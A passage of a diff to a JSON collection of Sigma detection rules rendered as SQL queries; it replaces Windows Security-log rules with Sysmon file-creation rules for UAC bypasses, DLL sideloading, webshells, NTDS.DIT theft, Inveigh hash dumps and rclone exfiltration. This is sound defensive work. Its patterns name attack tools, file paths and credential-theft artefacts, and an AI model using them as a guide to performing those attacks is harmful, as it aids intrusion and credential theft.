Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", 